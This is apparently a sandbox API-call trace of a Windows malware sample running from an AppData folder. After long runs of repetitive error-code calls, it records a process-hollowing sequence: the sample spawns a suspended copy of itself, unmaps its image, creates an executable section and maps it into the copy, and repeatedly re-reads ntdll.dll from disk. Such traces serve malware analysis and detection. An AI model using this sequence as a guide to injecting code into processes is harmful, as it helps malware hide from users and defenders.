GetLastError () returned 0x0 [0195.160] SetLastError (dwErrCode=0x0) [0195.160] GetLastError () returned 0x0 [0195.160] SetLastError (dwErrCode=0x0) [0195.160] GetLastError () returned 0x0 [0195.160] SetLastError (dwErrCode=0x0) [0195.160] GetLastError () returned 0x0 [0195.160] SetLastError (dwErrCode=0x0) [0195.160] GetLastError () returned 0x0 [0195.161] SetLastError (dwErrCode=0x0) [0195.161] GetLastError () returned 0x0 [0195.161] SetLastError (dwErrCode=0x0) [0195.161] GetLastError () returned 0x0 [0195.161] SetLastError (dwErrCode=0x0) [0195.161] GetLastError () returned 0x0 [0195.161] SetLastError (dwErrCode=0x0) [0195.161] GetLastError () returned 0x0 [0195.161] SetLastError (dwErrCode=0x0) [0195.161] GetLastError () returned 0x0 [0195.161] SetLastError (dwErrCode=0x0) [0195.161] GetLastError () returned 0x0 [0195.161] SetLastError (dwErrCode=0x0) [0195.161] GetLastError () returned 0x0 [0195.161] SetLastError (dwErrCode=0x0) [0195.161] GetLastError () returned 0x0 [0195.161] SetLastError (dwErrCode=0x0) [0195.161] GetLastError () returned 0x0 [0195.161] SetLastError (dwErrCode=0x0) [0195.161] GetLastError () returned 0x0 [0195.161] SetLastError (dwErrCode=0x0) [0195.162] GetLastError () returned 0x0 [0195.162] SetLastError (dwErrCode=0x0) [0195.162] GetLastError () returned 0x0 [0195.162] SetLastError (dwErrCode=0x0) [0195.162] GetLastError () returned 0x0 [0195.162] SetLastError (dwErrCode=0x0) [0195.162] GetLastError () returned 0x0 [0195.162] SetLastError (dwErrCode=0x0) [0195.162] GetLastError () returned 0x0 [0195.162] SetLastError (dwErrCode=0x0) [0195.162] GetLastError () returned 0x0 [0195.162] SetLastError (dwErrCode=0x0) [0195.162] GetLastError () returned 0x0 [0195.162] SetLastError (dwErrCode=0x0) [0195.162] GetLastError () returned 0x0 [0195.162] SetLastError (dwErrCode=0x0) [0195.162] GetLastError () returned 0x0 [0195.162] SetLastError (dwErrCode=0x0) [0195.162] GetLastError () returned 0x0 [0195.162] SetLastError (dwErrCode=0x0) [0195.162] GetLastError () returned 0x0 [0195.163] SetLastError (dwErrCode=0x0) [0195.163] GetLastError () returned 0x0 [0195.163] SetLastError (dwErrCode=0x0) [0195.163] GetLastError () returned 0x0 [0195.163] SetLastError (dwErrCode=0x0) [0195.163] GetLastError () returned 0x0 [0195.163] SetLastError (dwErrCode=0x0) [0195.163] GetLastError () returned 0x0 [0195.163] SetLastError (dwErrCode=0x0) [0195.163] GetLastError () returned 0x0 [0195.163] SetLastError (dwErrCode=0x0) [0195.163] GetLastError () returned 0x0 [0195.163] SetLastError (dwErrCode=0x0) [0195.163] GetLastError () returned 0x0 [0195.163] SetLastError (dwErrCode=0x0) [0195.163] GetLastError () returned 0x0 [0195.163] SetLastError (dwErrCode=0x0) [0195.163] GetLastError () returned 0x0 [0195.163] SetLastError (dwErrCode=0x0) [0195.163] GetLastError () returned 0x0 [0195.163] SetLastError (dwErrCode=0x0) [0195.163] GetLastError () returned 0x0 [0195.164] SetLastError (dwErrCode=0x0) [0195.164] GetLastError () returned 0x0 [0195.164] SetLastError (dwErrCode=0x0) [0195.164] GetLastError () returned 0x0 [0195.164] SetLastError (dwErrCode=0x0) [0195.164] GetLastError () returned 0x0 [0195.164] SetLastError (dwErrCode=0x0) [0195.164] GetLastError () returned 0x0 [0195.164] SetLastError (dwErrCode=0x0) [0195.164] GetLastError () returned 0x0 [0195.164] SetLastError (dwErrCode=0x0) [0195.164] GetLastError () returned 0x0 [0195.164] SetLastError (dwErrCode=0x0) [0195.164] GetLastError () returned 0x0 [0195.164] SetLastError (dwErrCode=0x0) [0195.164] GetLastError () returned 0x0 [0195.164] SetLastError (dwErrCode=0x0) [0195.164] GetLastError () returned 0x0 [0195.164] SetLastError (dwErrCode=0x0) [0195.164] GetLastError () returned 0x0 [0195.164] SetLastError (dwErrCode=0x0) [0195.165] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0195.166] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40c6c1) returned 0x0 [0195.166] GetLastError () returned 0x0 [0195.166] SetLastError (dwErrCode=0x0) [0195.166] GetLastError () returned 0x0 [0195.166] SetLastError (dwErrCode=0x0) [0195.166] GetLastError () returned 0x0 [0195.166] SetLastError (dwErrCode=0x0) [0195.166] GetLastError () returned 0x0 [0195.166] SetLastError (dwErrCode=0x0) [0195.166] GetLastError () returned 0x0 [0195.166] SetLastError (dwErrCode=0x0) [0195.166] GetLastError () returned 0x0 [0195.166] SetLastError (dwErrCode=0x0) [0195.166] GetLastError () returned 0x0 [0195.166] SetLastError (dwErrCode=0x0) [0195.166] GetLastError () returned 0x0 [0195.166] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.167] GetLastError () returned 0x0 [0195.167] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.168] GetLastError () returned 0x0 [0195.168] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.169] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.169] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.169] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.169] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.169] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.169] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.169] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.169] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.169] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.169] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.169] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.169] SetLastError (dwErrCode=0x0) [0195.169] GetLastError () returned 0x0 [0195.170] SetLastError (dwErrCode=0x0) [0195.170] GetLastError () returned 0x0 [0195.170] SetLastError (dwErrCode=0x0) [0195.170] GetLastError () returned 0x0 [0195.170] SetLastError (dwErrCode=0x0) [0195.170] GetLastError () returned 0x0 [0195.170] SetLastError (dwErrCode=0x0) [0195.170] GetLastError () returned 0x0 [0195.170] SetLastError (dwErrCode=0x0) [0195.170] GetLastError () returned 0x0 [0195.170] SetLastError (dwErrCode=0x0) [0195.170] GetLastError () returned 0x0 [0195.170] SetLastError (dwErrCode=0x0) [0195.170] GetLastError () returned 0x0 [0195.170] SetLastError (dwErrCode=0x0) [0195.170] GetLastError () returned 0x0 [0195.170] SetLastError (dwErrCode=0x0) [0195.170] GetLastError () returned 0x0 [0195.170] SetLastError (dwErrCode=0x0) [0195.170] GetLastError () returned 0x0 [0195.170] SetLastError (dwErrCode=0x0) [0195.170] GetLastError () returned 0x0 [0195.170] SetLastError (dwErrCode=0x0) [0199.972] GetProcAddress (hModule=0x74d70000, lpProcName="VirtualAlloc") returned 0x74d88b70 [0199.973] VirtualAlloc (lpAddress=0x0, dwSize=0xb09eb, flAllocationType=0x1000, flProtect=0x40) returned 0x1e70000 [0200.021] GetProcAddress (hModule=0x74d70000, lpProcName="VirtualAlloc") returned 0x74d88b70 [0200.021] GetProcAddress (hModule=0x74d70000, lpProcName="ExitProcess") returned 0x74d974f0 [0200.021] VirtualAlloc (lpAddress=0x0, dwSize=0x6e800, flAllocationType=0x1000, flProtect=0x40) returned 0x390000 [0200.033] VirtualAlloc (lpAddress=0x0, dwSize=0x1be0, flAllocationType=0x3000, flProtect=0x40) returned 0x2e0000 [0200.037] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x190ff8, nSize=0x103 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adsldraw\\autoclb.exe")) returned 0x3a [0200.037] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe\" " [0200.037] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpCommandLine="\"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x190fa0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x191290 | out: lpCommandLine="\"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe\" ", lpProcessInformation=0x191290*(hProcess=0x17c, hThread=0x178, dwProcessId=0x51c, dwThreadId=0x710)) returned 1 [0200.054] GetThreadContext (in: hThread=0x178, lpContext=0x190cb0 | out: lpContext=0x190cb0*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x40aa50, Ebp=0x0, Eip=0x77a1aef0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0200.055] ReadProcessMemory (in: hProcess=0x17c, lpBaseAddress=0x7ffde008, lpBuffer=0x190f94, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x190f94*, lpNumberOfBytesRead=0x0) returned 1 [0200.055] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190b20 | out: Wow64Process=0x190b20) returned 1 [0200.059] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0200.060] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0200.060] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000 [0200.060] ReadFile (in: hFile=0x184, lpBuffer=0x1ff0000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a58, lpOverlapped=0x0 | out: lpBuffer=0x1ff0000*, lpNumberOfBytesRead=0x190a58*=0x176638, lpOverlapped=0x0) returned 1 [0200.100] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000 [0200.118] CloseHandle (hObject=0x184) returned 1 [0200.119] VirtualFree (lpAddress=0x1ff0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.125] VirtualFree (lpAddress=0x2170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.131] NtUnmapViewOfSection (ProcessHandle=0x17c, BaseAddress=0x400000) returned 0x0 [0200.138] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190adc | out: Wow64Process=0x190adc) returned 1 [0200.142] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0200.142] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0200.142] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000 [0200.142] ReadFile (in: hFile=0x184, lpBuffer=0x1ff0000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a14, lpOverlapped=0x0 | out: lpBuffer=0x1ff0000*, lpNumberOfBytesRead=0x190a14*=0x176638, lpOverlapped=0x0) returned 1 [0200.161] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000 [0200.183] CloseHandle (hObject=0x184) returned 1 [0200.183] VirtualFree (lpAddress=0x1ff0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.204] VirtualFree (lpAddress=0x2170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.209] NtCreateSection (in: SectionHandle=0x190b18, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x190f80, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x190b18*=0x184) returned 0x0 [0200.209] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190ab0 | out: Wow64Process=0x190ab0) returned 1 [0200.213] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0200.214] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0200.214] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000 [0200.214] ReadFile (in: hFile=0x180, lpBuffer=0x1ff0000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x1909e8, lpOverlapped=0x0 | out: lpBuffer=0x1ff0000*, lpNumberOfBytesRead=0x1909e8*=0x176638, lpOverlapped=0x0) returned 1 [0200.230] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000 [0200.277] CloseHandle (hObject=0x180) returned 1 [0200.278] VirtualFree (lpAddress=0x1ff0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.284] VirtualFree (lpAddress=0x2170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.290] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x17c, BaseAddress=0x190b0c*=0x400000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x190ab4*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x190b0c*=0x400000, SectionOffset=0x0, ViewSize=0x190ab4*=0x71000) returned 0x0 [0200.322] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190ab0 | out: Wow64Process=0x190ab0) returned 1 [0200.325] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0200.325] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0200.325] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000 [0200.326] ReadFile (in: hFile=0x180, lpBuffer=0x1ff0000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x1909e8, lpOverlapped=0x0 | out: lpBuffer=0x1ff0000*, lpNumberOfBytesRead=0x1909e8*=0x176638, lpOverlapped=0x0) returned 1 [0200.347] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000 [0200.366] CloseHandle (hObject=0x180) returned 1 [0200.366] VirtualFree (lpAddress=0x1ff0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.372] VirtualFree (lpAddress=0x2170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.378] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0xffffffffffffffff, BaseAddress=0x190b0c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x190ab4*=0x71000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x190b0c*=0x1f30000, SectionOffset=0x0, ViewSize=0x190ab4*=0x71000) returned 0x0 [0200.383] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190af4 | out: Wow64Process=0x190af4) returned 1 [0200.386] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0200.386] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0200.386] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000 [0200.386] ReadFile (in: hFile=0x180, lpBuffer=0x1ff0000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a2c, lpOverlapped=0x0 | out: lpBuffer=0x1ff0000*, lpNumberOfBytesRead=0x190a2c*=0x176638, lpOverlapped=0x0) returned 1 [0200.404] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000 